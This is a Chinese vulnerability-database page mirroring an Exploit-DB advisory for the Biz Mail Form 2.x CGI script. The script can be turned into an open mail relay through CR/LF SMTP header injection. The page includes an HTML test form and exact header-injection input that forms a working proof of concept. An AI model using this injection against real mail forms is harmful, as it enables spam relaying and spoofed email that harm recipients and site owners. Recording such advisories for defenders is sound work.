Biz Mail Form 2.x – Unauthorized Mail Relay

Biz Mail Form 2.x – Unauthorized Mail Relay

漏洞ID 1054921 漏洞类型
发布时间 2005-02-22 更新时间 2005-02-22
图片[1]-Biz Mail Form 2.x – Unauthorized Mail Relay-安全小百科CVE编号 N/A
图片[2]-Biz Mail Form 2.x – Unauthorized Mail Relay-安全小百科CNNVD-ID N/A
漏洞平台 CGI CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/25147
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/12620/info

Biz Mail Form is prone to a vulnerability that allows the application to be abused as a mail relay.

An attacker can exploit this issue to inject arbitrary SMTP headers by using CR and LF sequences.

If successful, it becomes possible to abuse the application as a mail relay. Email may be sent to arbitrary computers. This could be exploited by spammers or other malicious parties.

Update: It is reported that the update to address this issue (Biz Mail Form 2.2) is vulnerable to this issue as well. The affected version is being added as a vulnerable package and the fixes are being removed. 

<HTML>
<HEAD> <TITLE>Exploit Test Page</TITLE> </HEAD>
<BODY>
<form action="http://www.example.com/cgi-bin/bizmail/bizmail.cgi"
method="POST" name="Subscribe">
<TEXTAREA rows="5" name="email"></textarea>
<INPUT TYPE="submit" VALUE="Submit" class="submit">
</FORM> </BODY> </HTML>

In the textbox that pops up, enter in the following (begin by hitting
enter to insert a blank line)

From:[email protected]
To:[email protected]
Subject:Exploit Test

This is a test

Click submit. You'll receive an email from the bizmail script, but
you won't receive the normal contact email. You can check the .dat
file and see a copy of what you sent.

相关推荐: BugZilla Post_Bug.CGI Bug Report Spoofing Vulnerability

BugZilla Post_Bug.CGI Bug Report Spoofing Vulnerability 漏洞ID 1102846 漏洞类型 Access Validation Error 发布时间 2001-11-05 更新时间 2001-11-05 …

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享